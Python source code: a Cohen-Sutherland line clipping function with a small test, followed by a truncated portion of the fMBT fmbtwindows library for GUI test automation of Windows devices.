#from numba import jit
'''
forked from https://bitbucket.org/marcusva/py-sdl2 (which has public-domain license)
The MIT License (MIT)
Copyright (c) 2014 Michael Hirsch
Nov 2014: returning NaN instead of None for Numba compatability
(Numba 0.15.1 can't do "is not None")
reference: http://en.wikipedia.org/wiki/Cohen%E2%80%93Sutherland_algorithm
I have corrected errors in the cohensutherland code and compared cohensutherland with Matlab polyxpoly() results.
'''
#@jit
def cohensutherland(xmin, ymax, xmax, ymin, x1, y1, x2, y2):
"""Clips a line to a rectangular area.
This implements the Cohen-Sutherland line clipping algorithm. xmin,
ymax, xmax and ymin denote the clipping area, into which the line
defined by x1, y1 (start point) and x2, y2 (end point) will be
clipped.
If the line does not intersect with the rectangular clipping area,
four None values will be returned as tuple. Otherwise a tuple of the
clipped line points will be returned in the form (cx1, cy1, cx2, cy2).
"""
INSIDE,LEFT, RIGHT, LOWER, UPPER = 0,1, 2, 4, 8
def _getclip(xa, ya):
#if dbglvl>1: print('point: '),; print(xa,ya)
p = INSIDE #default is inside
# consider x
if xa < xmin:
p |= LEFT
elif xa > xmax:
p |= RIGHT
# consider y
if ya < ymin:
p |= LOWER # bitwise OR
elif ya > ymax:
p |= UPPER #bitwise OR
return p
# check for trivially outside lines
k1 = _getclip(x1, y1)
k2 = _getclip(x2, y2)
#%% examine non-trivially outside points
#bitwise OR |
while (k1 | k2) != 0: # if both points are inside box (0000) , ACCEPT trivial whole line in box
# if line trivially outside window, REJECT
if (k1 & k2) != 0: #bitwise AND &
#if dbglvl>1: print(' REJECT trivially outside box')
#return nan, nan, nan, nan
return None, None, None, None
#non-trivial case, at least one point outside window
# this is not a bitwise or, it's the word "or"
opt = k1 or k2 # take first non-zero point, short circuit logic
if opt & UPPER:
x = x1 + (x2 - x1) * (ymax - y1) / (y2 - y1)
y = ymax
elif opt & LOWER:
x = x1 + (x2 - x1) * (ymin - y1) / (y2 - y1)
y = ymin
elif opt & RIGHT:
y = y1 + (y2 - y1) * (xmax - x1) / (x2 - x1)
x = xmax
elif opt & LEFT:
y = y1 + (y2 - y1) * (xmin - x1) / (x2 - x1)
x = xmin
else:
raise RuntimeError('Undefined clipping state')
if opt == k1:
x1, y1 = x, y
k1 = _getclip(x1, y1)
#if dbglvl>1: print('checking k1: ' + str(x) + ',' + str(y) + ' ' + str(k1))
elif opt == k2:
#if dbglvl>1: print('checking k2: ' + str(x) + ',' + str(y) + ' ' + str(k2))
x2, y2 = x, y
k2 = _getclip(x2, y2)
return x1, y1, x2, y2
if __name__ == '__main__': #test case
from numpy.testing import assert_array_almost_equal
'''
make box with corners LL/UR (1,3) (4,5)
and line segment with ends (0,0) (4,6)
'''
x1, y1, x2, y2 = cohensutherland(1, 5, 4, 3,
0, 0, 4, 6)
assert_array_almost_equal([x1,y1,x2,y2],[2,3,3.3333333333333,5])
|
# fMBT, free Model Based Testing tool
# Copyright (c) 2014, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU Lesser General Public License,
# version 2.1, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
"""
This is library implements fMBT GUITestInterface for Windows
How to setup Windows device under test
1. Install Python 2.X. (For example 2.7.)
2. Add Python to PATH, so that command "python" starts the interpreter.
3. Copy fMBT's pythonshare directory to Windows.
4. In the pythonshare directory, run "python setup.py install"
5. Run:
cd \\python27\\scripts
python pythonshare-server --interface=all --password=xxxxxxxx
How to connect to the device
import fmbtwindows
d = fmbtwindows.Device("IP-ADDRESS-OF-THE-DEVICE", password="xxxxxxxx")
"""
import ast
import base64
import fmbt
import fmbt_config
import fmbtgti
import inspect
import math
import os
import pythonshare
import shutil
import subprocess
import time
import zlib
try:
import pycosh
except ImportError:
pycosh = None
try:
import fmbtpng
except ImportError:
fmbtpng = None
if os.name == "nt":
_g_closeFds = False
else:
_g_closeFds = True
def _adapterLog(msg):
fmbt.adapterlog("fmbtwindows %s" % (msg,))
def _run(command, expectedExitStatus=None):
"""
Execute command in child process, return status, stdout, stderr.
"""
if type(command) == str:
shell = True
else:
shell = False
try:
p = subprocess.Popen(command, shell=shell,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=_g_closeFds)
if expectedExitStatus != None:
out, err = p.communicate()
else:
out, err = ('', None)
except Exception, e:
class fakeProcess(object): pass
p = fakeProcess
p.returncode = 127
out, err = ('', e)
exitStatus = p.returncode
if (expectedExitStatus != None and
exitStatus != expectedExitStatus and
exitStatus not in expectedExitStatus):
msg = "Executing %s failed. Exit status: %s, expected %s" % (
command, exitStatus, expectedExitStatus)
_adapterLog("%s\n stdout: %s\n stderr: %s\n" % (msg, out, err))
raise FMBTWindowsError(msg)
return exitStatus, out, err
_g_keyNames = [
"VK_LBUTTON", "VK_RBUTTON", "VK_CANCEL", "VK_MBUTTON",
"VK_XBUTTON1", "VK_XBUTTON2", "VK_BACK", "VK_TAB", "VK_CLEAR",
"VK_RETURN", "VK_SHIFT", "VK_CONTROL", "VK_MENU", "VK_PAUSE",
"VK_CAPITAL", "VK_KANA", "VK_HANGUL", "VK_JUNJA", "VK_FINAL",
"VK_HANJA", "VK_KANJI", "VK_ESCAPE", "VK_CONVERT", "VK_NONCONVERT",
"VK_ACCEPT", "VK_MODECHANGE", "VK_SPACE", "VK_PRIOR", "VK_NEXT",
"VK_END", "VK_HOME", "VK_LEFT", "VK_UP", "VK_RIGHT", "VK_DOWN",
"VK_SELECT", "VK_PRINT", "VK_EXECUTE", "VK_SNAPSHOT", "VK_INSERT",
"VK_DELETE", "VK_HELP", "VK_LWIN", "VK_RWIN", "VK_APPS", "VK_SLEEP",
"VK_NUMPAD0", "VK_NUMPAD1", "VK_NUMPAD2", "VK_NUMPAD3", "VK_NUMPAD4",
"VK_NUMPAD5", "VK_NUMPAD6", "VK_NUMPAD7", "VK_NUMPAD8", "VK_NUMPAD9",
"VK_MULTIPLY", "VK_ADD", "VK_SEPARATOR", "VK_SUBTRACT", "VK_DECIMAL",
"VK_DIVIDE", "VK_F1", "VK_F2", "VK_F3", "VK_F4", "VK_F5", "VK_F6",
"VK_F7", "VK_F8", "VK_F9", "VK_F10", "VK_F11", "VK_F12", "VK_F13",
"VK_F14", "VK_F15", "VK_F16", "VK_F17", "VK_F18", "VK_F19", "VK_F20",
"VK_F21", "VK_F22", "VK_F23", "VK_F24", "VK_NUMLOCK", "VK_SCROLL",
"VK_LSHIFT", "VK_RSHIFT", "VK_LCONTROL", "VK_RCONTROL", "VK_LMENU",
"VK_RMENU", "VK_BROWSER_BACK", "VK_BROWSER_FORWARD",
"VK_BROWSER_REFRESH", "VK_BROWSER_STOP", "VK_BROWSER_SEARCH",
"VK_BROWSER_FAVORITES", "VK_BROWSER_HOME", "VK_VOLUME_MUTE",
"VK_VOLUME_DOWN", "VK_VOLUME_UP", "VK_MEDIA_NEXT_TRACK",
"VK_MEDIA_PREV_TRACK", "VK_MEDIA_STOP", "VK_MEDIA_PLAY_PAUSE",
"VK_LAUNCH_MAIL", "VK_LAUNCH_MEDIA_SELECT", "VK_LAUNCH_APP1",
"VK_LAUNCH_APP2", "VK_OEM_1", "VK_OEM_PLUS", "VK_OEM_COMMA",
"VK_OEM_MINUS", "VK_OEM_PERIOD", "VK_OEM_2", "VK_OEM_3", "VK_OEM_4",
"VK_OEM_5", "VK_OEM_6", "VK_OEM_7", "VK_OEM_8", "VK_OEM_102",
"VK_PROCESSKEY", "VK_PACKET", "VK_ATTN", "VK_CRSEL", "VK_EXSEL",
"VK_EREOF", "VK_PLAY", "VK_ZOOM", "VK_PA1", "VK_OEM_CLEAR", "0", "1",
"2", "3", "4", "5", "6", "7", "8", "9", "A", "B", "C", "D", "E", "F",
"G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T",
"U", "V", "W", "X", "Y", "Z"]
_g_viewSources = ["enumchildwindows", "uiautomation",
"uiautomation/raw", "uiautomation/control",
"uiautomation/content"]
# ShowWindow showCmd
SW_HIDE = 0
SW_NORMAL = 1
SW_MINIMIZED = 2
SW_MAXIMIZE = 3
SW_NOACTIVATE = 4
SW_SHOW = 5
SW_MINIMIZE = 6
SW_MINNOACTIVE = 7
SW_SHOWNA = 8
SW_RESTORE = 9
SW_DEFAULT = 10
SW_FORCEMINIMIZE = 11
sortItems = fmbtgti.sortItems
class ViewItem(fmbtgti.GUIItem):
def __init__(self, view, itemId, parentId, className, text, bbox, dumpFilename,
rawProperties=None):
self._view = view
self._itemId = itemId
self._parentId = parentId
self._className = className
self._text = text
if rawProperties:
self._properties = rawProperties
else:
self._properties = {}
fmbtgti.GUIItem.__init__(self, self._className, bbox, dumpFilename)
def branch(self):
"""Returns list of view items from the root down to this item
Note: works only for UIAutomation backend"""
if not self._view._viewSource.startswith("uiautomation"):
raise NotImplementedError(
"branch() works only for uiautomation at the moment")
rv = []
itemId = self._itemId
while itemId:
rv.append(self._view._viewItems[itemId])
if itemId in self._view._viewItems:
itemId = self._view._viewItems[itemId]._parentId
else:
itemId = None
rv.reverse()
return rv
def children(self):
if self._view._viewSource.startswith("enumchildwindows"):
return [self._view._viewItems[winfo[0]]
for winfo in self._view._itemTree[self._itemId]]
else:
items = self._view._viewItems
return [items[itemHash]
for itemHash in items
if items[itemHash]._parentId == self._itemId]
def parent(self):
return self._parentId
def parentItem(self):
try:
return self._view._viewItems[self._parentId]
except KeyError:
return None
def id(self):
return self._itemId
def properties(self):
return self._properties
def text(self):
return self._text
def dumpProperties(self):
rv = []
if self._properties:
for key in sorted(self._properties.keys()):
rv.append("%s=%s" % (key, self._properties[key]))
return "\n".join(rv)
def __str__(self):
return "ViewItem(%s)" % (self._view._dumpItem(self),)
class View(object):
def __init__(self, dumpFilename, itemTree, itemOnScreen=None):
self._dumpFilename = dumpFilename
self._itemTree = itemTree
self._rootItem = None
self._viewItems = {}
if itemOnScreen == None:
self._itemOnScreen = lambda item: True
else:
self._itemOnScreen = itemOnScreen
if isinstance(itemTree, dict):
# data from enumchildwindows:
self._viewSource = "enumchildwindows"
for itemId, winfoList in itemTree.iteritems():
for winfo in winfoList:
itemId, parentId, className, text, bbox = winfo
self._viewItems[itemId] = ViewItem(
self, itemId, parentId, className, text, bbox, dumpFilename)
self._rootItem = self._viewItems[self._itemTree["root"][0][0]]
elif isinstance(itemTree, list):
# data from uiautomation
# list of dictionaries, each of which contains properties of an item
self._viewSource = "uiautomation"
for elt in itemTree:
bboxString = elt.get("BoundingRectangle", "0;0;0;0")
if ";" in bboxString:
bboxSeparator = ";"
else:
bboxSeparator = ","
try:
bbox = [int(coord) for coord in bboxString.split(bboxSeparator)]
bbox[2] = bbox[0] + bbox[2] # width to right
bbox[3] = bbox[1] + bbox[3] # height to bottom
bbox = tuple(bbox)
except Exception, e:
bbox = (0, 0, 0, 0)
text = elt.get("Value", "")
if text == "":
text = elt.get("Name", "")
vi = ViewItem(
self, int(elt["hash"]), int(elt["parent"]),
elt.get("ClassName", ""),
text,
bbox,
dumpFilename,
elt)
self._viewItems[int(elt["hash"])] = vi
if vi.parent() == 0:
self._rootItem = vi
if not self._rootItem:
raise ValueError("no root item in view data")
def _intCoords(self, *args):
# TODO: relative coordinates like (0.5, 0.9)
return [int(c) for c in args[0]]
def filename(self):
return self._dumpFilename
def rootItem(self):
return self._rootItem
def _dumpItem(self, viewItem):
return "id=%s cls=%s text=%s bbox=%s" % (
viewItem._itemId, repr(viewItem._className), repr(viewItem._text),
viewItem._bbox)
def _dumpTree(self, rootItem, depth=0):
l = ["%s%s" % (" " * (depth * 4), self._dumpItem(rootItem))]
for child in rootItem.children():
l.extend(self._dumpTree(child, depth+1))
return l
def dumpTree(self, rootItem=None):
"""
Returns item tree as a string
"""
if rootItem == None:
rootItem = self.rootItem()
return "\n".join(self._dumpTree(rootItem))
def __str__(self):
return "View(%s, %s items)" % (repr(self._dumpFilename), len(self._viewItems))
def findItems(self, comparator, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
foundItems = []
if count == 0: return foundItems
if searchRootItem != None:
if comparator(searchRootItem) and (
not onScreen or (self._itemOnScreen(searchRootItem))):
foundItems.append(searchRootItem)
for c in searchRootItem.children():
foundItems.extend(self.findItems(comparator, count=count-len(foundItems), searchRootItem=c, onScreen=onScreen))
else:
if searchItems:
domain = iter(searchItems)
else:
domain = self._viewItems.itervalues
for i in domain():
if comparator(i) and (not onScreen or (self._itemOnScreen(i))):
foundItems.append(i)
if count > 0 and len(foundItems) >= count:
break
return foundItems
def findItemsByText(self, text, partial=False, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
if partial:
c = lambda item: (text in item._text)
else:
c = lambda item: (text == item._text)
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
def findItemsByClass(self, className, partial=False, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
if partial:
c = lambda item: (className in item._className)
else:
c = lambda item: (className == item._className)
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
def findItemsById(self, itemId, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
c = lambda item: (itemId == item._itemId or itemId == item.properties().get("AutomationId", None))
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
def findItemsByProperties(self, properties, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
"""
Returns ViewItems where every property matches given properties
Parameters:
properties (dictionary):
names and required values of properties
Example:
view.findItemsByProperties({"Value": "HELLO", "Name": "File name:"})
See also:
viewitem.dumpProperties()
Notes:
- requires uiautomation (refreshView(viewSource="uiautomation"))
- all names and values are strings
"""
c = lambda item: 0 == len([key for key in properties
if properties[key] != item.properties().get(key, None)])
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
def findItemsByPos(self, pos, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
"""
Returns list of ViewItems whose bounding box contains the position.
Parameters:
pos (pair of floats (0.0..0.1) or integers (x, y)):
coordinates that fall in the bounding box of found items.
other parameters: refer to findItems documentation.
Items are listed in ascending order based on area. They may
or may not be from the same branch in the widget hierarchy.
"""
x, y = self._intCoords(pos)
c = lambda item: (item.bbox()[0] <= x <= item.bbox()[2] and item.bbox()[1] <= y <= item.bbox()[3])
items = self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
# sort from smallest to greatest area
area_items = [((i.bbox()[2] - i.bbox()[0]) * (i.bbox()[3] - i.bbox()[1]), i) for i in items]
return [i for _, i in sorted(area_items)]
def items(self):
"""
Returns list of all items in the view
"""
return fmbtgti.sortItems(self._viewItems.values(), "topleft")
def save(self, fileOrDirName):
"""
Save view dump to a file.
"""
shutil.copy(self._dumpFilename, fileOrDirName)
class Device(fmbtgti.GUITestInterface):
def __init__(self, connspec=None, password=None, screenshotSize=(None, None),
connect=True, **kwargs):
"""Connect to windows device under test.
Parameters:
connspec (string or None, optional):
specification for connecting to a pythonshare
server that will run fmbtwindows-agent. The format is
"[socket://][password@]<host>[:<port>][/namespace]".
The default is None: run the agent on host, do not
connect to a pythonshare server (works only on Windows).
password (string or None, optional):
authenticate to pythonshare server with given
password. The default is None (no authentication).
rotateScreenshot (integer, optional)
rotate new screenshots by rotateScreenshot degrees.
Example: rotateScreenshot=-90. The default is 0 (no
rotation).
connect (boolean, optional):
Immediately establish connection to the device. The
default is True.
To prepare a windows device for connection, launch there
python pythonshare-server --password mysecretpwd
When not on trusted network, consider ssh port forward, for
instance.
"""
fmbtgti.GUITestInterface.__init__(self, **kwargs)
self._defaultViewSource = _g_viewSources[1]
self._refreshViewDefaults = kwargs
self._lastView = None
self._lastViewStats = {}
self._refreshViewRetryLimit = 1
self._connspec = connspec
self._password = password
if connect:
self.setConnection(WindowsConnection(
self._connspec, self._password))
else:
self.setConnection(None)
def closeWindow(self, window):
"""
Send WM_CLOSE to window
Parameters:
window (window title (string) or handle (integer)):
window to which the command will be sent.
Returns True on success, otherwise False.
"""
return self.existingConnection().sendCloseWindow(window)
def errorReporting(self):
"""
Returns Windows error reporting (WER) settings in a dictionary
See also: setErrorReporting()
MSDN WER Settings.
"""
supported_settings = ["DisableArchive",
"Disabled",
"DisableQueue",
"DontShowUI",
"DontSendAdditionalData",
"LoggingDisabled",
"MaxArchiveCount",
"MaxQueueCount"]
settings = {}
for setting in supported_settings:
settings[setting] = self.getRegistry(
r"HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting",
setting)[0]
return settings
def existingView(self):
if self._lastView:
return self._lastView
else:
raise FMBTWindowsError("view is not available. Missing refreshView()?")
def fileProperties(self, filepath):
"""
Returns file properties as a dictionary.
Parameters:
filepath (string):
full path to the file.
"""
escapedFilename = filepath.replace('/', '\\').replace('\\', r'\\\\')
return self.existingConnection().evalPython(
'''wmicGet("datafile",'''
'''componentArgs=("where", "name='%s'"))''' %
escapedFilename)
def getFile(self, remoteFilename, localFilename=None, compress=False):
"""
Fetch file from the device.
Parameters:
remoteFilename (string):
file to be fetched on device
localFilename (optional, string or None):
file to be saved to local filesystem. If None,
return contents of the file without saving them.
compress (optional, boolean or integer):
if True, file contents will be compressed for the transfer.
Integer (0-9) defines compression level. The default is
False: transfer without compression.
"""
return self._conn.recvFile(remoteFilename, localFilename, compress)
def getMatchingPaths(self, pathnamePattern):
"""
Returns list of paths matching pathnamePattern on the device.
Parameters:
pathnamePattern (string):
Pattern for matching files and directories on the device.
Example:
getMatchingPaths("c:/windows/*.ini")
Implementation runs glob.glob(pathnamePattern) on remote device.
"""
return self._conn.recvMatchingPaths(pathnamePattern)
def getClipboard(self):
"""
Returns clipboard contents in text format.
See also: setClipboard()
"""
return self.existingConnection().evalPython("getClipboardText()")
def itemOnScreen(self, guiItem, relation="touch", topWindowBbox=None):
"""
Returns True if bbox of guiItem is non-empty and on the screen
Parameters:
relation (string, optional):
One of the following:
- "overlap": item intersects the screen and the window.
- "touch": mid point (the default touch point) of the item
is within the screen and the window.
- "within": the screen and the window includes the item.
The default is "touch".
"""
if guiItem.properties().get("IsOffscreen", False) == "True":
return False
if relation == "touch":
x1, y1, x2, y2 = guiItem.bbox()
if x1 == x2 or y1 == y2:
return False # a dimension is missing => empty item
itemBox = (guiItem.coords()[0], guiItem.coords()[1],
guiItem.coords()[0] + 1, guiItem.coords()[1] + 1)
partial = True
elif relation == "overlap":
itemBox = guiItem.bbox()
partial = True
elif relation == "within":
itemBox = guiItem.bbox()
partial = False
else:
raise ValueError('invalid itemOnScreen relation: "%s"' % (relation,))
maxX, maxY = self.screenSize()
if topWindowBbox == None:
try:
topWindowBbox = self.topWindowProperties()['bbox']
except TypeError:
topWindowBbox = (0, 0, maxX, maxY)
return (fmbtgti._boxOnRegion(itemBox, (0, 0, maxX, maxY), partial=partial) and
fmbtgti._boxOnRegion(itemBox, topWindowBbox, partial=partial))
def kill(self, pid):
"""
Terminate process
Parameters:
pid (integer):
ID of the process to be terminated.
"""
try:
return self.existingConnection().evalPython(
"kill(%s)" % (repr(pid),))
except:
return False
def keyNames(self):
"""
Returns list of key names recognized by pressKey
"""
return sorted(_g_keyNames)
def osProperties(self):
"""
Returns OS properties as a dictionary
"""
return self.existingConnection().evalPython(
"wmicGet('os')")
def pinch(self, (x, y), startDistance, endDistance,
finger1Dir=90, finger2Dir=270, movePoints=20,
duration=0.75):
"""
Pinch (open or close) on coordinates (x, y).
Parameters:
x, y (integer):
the central point of the gesture. Values in range
[0.0, 1.0] are scaled to full screen width and
height.
startDistance, endDistance (float):
distance from both finger tips to the central point
of the gesture, at the start and at the end of the
gesture. Values in range [0.0, 1.0] are scaled up to
the distance from the coordinates to the edge of the
screen. Both finger tips will reach an edge if
distance is 1.0.
finger1Dir, finger2Dir (integer, optional):
directions for finger tip movements, in range [0,
360]. 0 is to the east, 90 to the north, etc. The
defaults are 90 and 270.
movePoints (integer, optional):
number of points to which finger tips are moved
after laying them to the initial positions. The
default is 20.
duration (float, optional):
duration of the gesture in seconds, the default is 0.75.
"""
screenWidth, screenHeight = self.screenSize()
screenDiagonal = math.sqrt(screenWidth**2 + screenHeight**2)
if x == None: x = 0.5
if y == None: y = 0.5
x, y = self.intCoords((x, y))
if type(startDistance) == float and 0.0 <= startDistance <= 1.0:
startDistanceInPixels = (
startDistance *
min(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
else:
startDistanceInPixels = int(startDistance)
if type(endDistance) == float and 0.0 <= endDistance <= 1.0:
endDistanceInPixels = (
endDistance *
min(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
else:
endDistanceInPixels = int(endDistance)
finger1startX = int(x + math.cos(math.radians(finger1Dir)) * startDistanceInPixels)
finger1startY = int(y - math.sin(math.radians(finger1Dir)) * startDistanceInPixels)
finger1endX = int(x + math.cos(math.radians(finger1Dir)) * endDistanceInPixels)
finger1endY = int(y - math.sin(math.radians(finger1Dir)) * endDistanceInPixels)
finger2startX = int(x + math.cos(math.radians(finger2Dir)) * startDistanceInPixels)
finger2startY = int(y - math.sin(math.radians(finger2Dir)) * startDistanceInPixels)
finger2endX = int(x + math.cos(math.radians(finger2Dir)) * endDistanceInPixels)
finger2endY = int(y - math.sin(math.radians(finger2Dir)) * endDistanceInPixels)
self.existingConnection().sendPinch(
(finger1startX, finger1startY), (finger1endX, finger1endY),
(finger2startX, finger2startY), (finger2endX, finger2endY),
movePoints, duration)
return True
def pinchOpen(self, (x, y) = (0.5, 0.5), startDistance=0.1, endDistance=0.5, **pinchKwArgs):
"""
Make the open pinch gesture.
Parameters:
x, y (integer, optional):
the central point of the gesture, the default is in
the middle of the screen.
startDistance, endDistance (float, optional):
refer to pinch documentation. The default is 0.1 and
0.5.
for the rest of the parameters, refer to pinch documentation.
"""
return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
def pinchClose(self, (x, y) = (0.5, 0.5), startDistance=0.5, endDistance=0.1, **pinchKwArgs):
"""
Make the close pinch gesture.
Parameters:
x, y (integer, optional):
the central point of the gesture, the default is in
the middle of the screen.
startDistance, endDistance (float, optional):
refer to pinch documentation. The default is 0.5 and
0.1.
rest of the parameters: refer to pinch documentation.
"""
return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
def putFile(self, localFilename, remoteFilepath):
"""
Send local file to the device.
Parameters:
localFilename (string):
file to be sent.
remoteFilepath (string):
destination on the device. If destination is an
existing directory, the file will be saved to the
directory with its original name. Otherwise the file
will be saved with remoteFilepath as new name.
"""
return self._conn.sendFile(localFilename, remoteFilepath)
def rmFile(self, remoteFilepath):
"""
Remove a file from the device.
Parameters:
remoteFilepath (string):
file to be removed from the device.
"""
return self.existingConnection().evalPython(
"os.remove(%s)" % (repr(remoteFilepath),))
def reconnect(self, connspec=None, password=None):
"""
Close connections to the device and reconnect.
Parameters:
connspec (string, optional):
Specification for new connection. The default is current
connspec.
password (string, optional):
Password for new connection. The default is current password.
"""
self.setConnection(None)
import gc
gc.collect()
if connspec != None:
self._connspec = connspec
if password != None:
self._password = password
if self._connspec == None:
_adapterLog("reconnect failed: missing connspec")
return False
try:
self.setConnection(WindowsConnection(
self._connspec, self._password))
return True
except Exception, e:
_adapterLog("reconnect failed: %s" % (e,))
return False
def refreshView(self, window=None, forcedView=None, viewSource=None,
items=None, properties=None, area=None):
"""
(Re)reads widgets on the top window and updates the latest view.
Parameters:
window (integer (hWnd) or string (title), optional):
read widgets from given window instead of the top window.
forcedView (View or filename, optional):
use given View object or view file instead of reading the
items from the device.
viewSource (string, optional):
source of UI information. Supported sources are:
"uiautomation" the UIAutomation framework.
"enumchildwindows" less data
but does not require UIAutomation.
The default is "uiautomation".
You can define TreeWalker used by "uiautomation" by defining
viewSource as "uiautomation/raw", "uiautomation/control" or
"uiautomation/content".
See also setViewSource().
items (list of view items, optional):
update only contents of these items in the view.
Works only for "uiautomation" view source.
properties (list of property names, optional):
read only given properties from items, the default
is to read all available properties.
Works only for "uiautomation" view source.
See also setViewSource().
area ((left, top, right, bottom), optional):
refresh only items that intersect the area.
The default is None: locations do not affect refreshed
items.
See also setRefreshViewDefaults().
Returns View object.
"""
if window == None:
window = self._refreshViewDefaults.get("window", None)
if forcedView == None:
forcedView = self._refreshViewDefaults.get("forcedView", None)
if viewSource == None:
viewSource = self.viewSource()
if not viewSource in _g_viewSources:
raise ValueError('invalid view source "%s"' % (viewSource,))
if items == None:
items = self._refreshViewDefaults.get("items", [])
if properties == None:
properties = self._refreshViewDefaults.get("properties", None)
if area == None:
area = self._refreshViewDefaults.get("area", None)
if forcedView != None:
retryCount = 0
startTime = time.time()
lastStartTime = startTime
viewFilename = forcedView
if isinstance(forcedView, View):
self._lastView = forcedView
elif type(forcedView) in [str, unicode]:
try:
self._lastView = View(forcedView, ast.literal_eval(file(viewFilename).read()))
except Exception:
self._lastView = None
endTime = time.time()
else:
if self.screenshotDir() == None:
self.setScreenshotDir(self._screenshotDirDefault)
if self.screenshotSubdir() == None:
self.setScreenshotSubdir(self._screenshotSubdirDefault)
viewFilename = self._newScreenshotFilepath()[:-3] + "view"
retryCount = 0
startTime = time.time()
lastStartTime = startTime
while True:
try:
topWindowBbox = self.topWindowProperties()['bbox']
except TypeError:
topWindowBbox = None # top window unavailable
if area:
leftTopRightBottom = (
self.intCoords((area[0], area[1])) +
self.intCoords((area[2], area[3])))
else:
leftTopRightBottom = None
if viewSource == "enumchildwindows":
viewData = self._conn.recvViewData(window)
else:
if "/" in viewSource:
walker = viewSource.split("/")[1]
else:
walker = "raw"
if properties != None:
if properties == "all":
viewItemProperties = None
elif properties == "fast":
viewItemProperties = ["AutomationId",
"BoundingRectangle",
"ClassName",
"HelpText",
"ToggleState",
"Value",
"Minimum",
"Maximum",
"Name"]
elif isinstance(properties, list) or isinstance(properties, tuple):
viewItemProperties = list(properties)
else:
raise ValueError('invalid properties argument, expected "all", '
'"fast" or a list')
else:
viewItemProperties = properties
viewData = self._conn.recvViewUIAutomation(
window, items, viewItemProperties, leftTopRightBottom, walker)
file(viewFilename, "w").write(repr(viewData))
try:
self._lastView = View(
viewFilename, viewData,
itemOnScreen=lambda i: self.itemOnScreen(i, topWindowBbox=topWindowBbox))
break
except Exception, e:
self._lastView = None
_adapterLog(
"refreshView %s failed (%s), source=%s topWindow=%s" %
(retryCount, e, repr(viewSource), self.topWindow()))
retryCount += 1
if retryCount < self._refreshViewRetryLimit:
time.sleep(0.2)
else:
break
lastStartTime = time.time()
endTime = time.time()
itemCount = -1
if self._lastView:
itemCount = len(self._lastView._viewItems)
self._lastViewStats = {
"retries": retryCount,
"timestamp": endTime,
"total time": endTime - startTime,
"last time": endTime - lastStartTime,
"filename": viewFilename,
"source": viewSource,
"forced": (forcedView != None),
"window": window,
"view": str(self._lastView),
"item count": itemCount}
return self._lastView
def refreshViewDefaults(self):
"""Returns default arguments for refreshView() calls.
See also setRefreshViewDefaults().
"""
return dict(self._refreshViewDefaults)
def setClipboard(self, data):
"""
Set text on clipboard
Parameters:
data (string):
data to be set on the clipboard.
Note: any type of data on clipboard will be emptied.
See also: getClipboard()
"""
return self.existingConnection().evalPython(
"setClipboardText(%s)" % (repr(data),))
def setErrorReporting(self, settings):
"""
Modify Windows error reporting settings (WER)
Parameters:
settings (dictionary):
WER settings and values to be set.
Example: disable showing interactive crash dialogs
setErrorReporting({"DontShowUI": 1})
See also: errorReporting(),
MSDN WER Settings.
"""
for setting in settings:
self.setRegistry(
r"HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting",
setting, settings[setting])
return True
def setDisplaySize(self, size):
"""
Transform coordinates of synthesized events (like a tap) from
screenshot resolution to display input area size. By default
events are synthesized directly to screenshot coordinates.
Parameters:
size (pair of integers: (width, height)):
width and height of display in pixels. If not given,
values from EnumDisplayMonitors are used.
Returns None.
"""
width, height = size
screenWidth, screenHeight = self.screenSize()
self._conn.setScreenToDisplayCoords(
lambda x, y: (x * width / screenWidth,
y * height / screenHeight))
self._conn.setDisplayToScreenCoords(
lambda x, y: (x * screenWidth / width,
y * screenHeight / height))
def setForegroundWindow(self, window):
"""
Set a window with the title as a foreground window
Parameters:
window (title (string) or hwnd (integer):
title or handle of the window to be raised
foreground.
Returns True if the window was brought to the foreground,
otherwise False.
Notes: calls SetForegroundWindow in user32.dll.
"""
return self.existingConnection().sendSetForegroundWindow(window)
def setRefreshViewDefaults(self, **kwargs):
"""Set new default arguments for refreshView() calls
Parameters:
**kwargs (keyword arguments)
new default values for optional refreshView() parameters.
Note: default arguments are overridden by arguments given
directly in refreshView calls.
Note: setViewSource() can change the default arguments.
Example:
setRefreshViewDefaults(window="My app title",
viewSource="uiautomation/content")
"""
self._refreshViewDefaults = kwargs
def findRegistry(self, rootKey, key=None, valueName=None, limit=1):
"""Search for key and/or valueName from the registry.
Returns a list of matching (fullKeyPath, valueName) pairs
found under the rootKey. The list has at most limit items, the
default is 1.
Parameters:
rootKey (string):
root key path for the search. Example:
"HKEY_LOCAL_MACHINE".
key (string, optional):
key name to be searched for under the rootKey.
The key is a regular expression that is searched for
from full key path. Use "\\name$" to require exact
match.
If not given, valueName should be defined.
valueName (string, optional):
value name to be searched for under the rootKey.
The value can be a regular expression.
If not given, key should be defined and
returned valueName will be None.
limit (integer, optional):
